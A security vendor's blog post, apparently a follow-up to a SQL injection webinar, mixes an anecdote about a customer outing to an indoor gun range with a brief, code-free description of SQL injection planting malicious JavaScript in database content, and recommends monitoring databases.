As a follow up to our ADC webinar on SQL Injection led by our CTO - Amichai Shulman, I had an opportunity to meet with some of our customers and discuss the latest SQL attack trends.
Our partner, AppSec Consulting, chose the location, which I admit was not to my liking. They choose an indoor gun range and while for some people, shooting stuff is the ultimate stress reliever, I'm not one of them. As a veteran Lieutenant of the Israeli Defense Force, shooting brings up some stressful memories. If you have never experienced shooting in an indoor range, let me tell you - it's scary. The sound produced by gunfire is deafening outdoors, but when the acoustical energy it produces is confined to a small indoor space as in a firing range, it gets even louder. Add to that the fact that some shooters are new to the experience, and some (not our customers) may be doing stupid, crazy things... oh, well. I stayed outside while the guys were having fun.
But as I mentioned, we spent some time talking about SQL Injection attacks as well. Often when we talk about SQL Injection attacks, we think about protecting the application with a web application firewall. Less often, we talk about the impact on the database behind the website. In the past, when most of the SQL Injection attacks tried to get valuable information out of the database, and in that case we didn't compromise or change anything on the RDBMS itself. But lately we see more attacks that try to manipulate the content of the RDBMS. The example I used at my demo showed how you can use SQL Injection to insert into the database a command to run JavaScript. The compromised database can have a piece of JavaScript (JS) embedded in it, which in turn points to another JS file on a separate domain. Any web page which is now built based on a compromised database may result in running these scripts, downloading malicious code and silently distributing malware through the connected system.
A compromised database entry:
The bottom line is that databases are a critical component of any web application and when protecting the application you can not ignore the database itself. Databases should be scanned and monitored continuously to prevent compromised content.
I hope our next event takes place at a less stressful location - perhaps even an outdoor gun range. How about paintball? I heard that's a lot of fun.
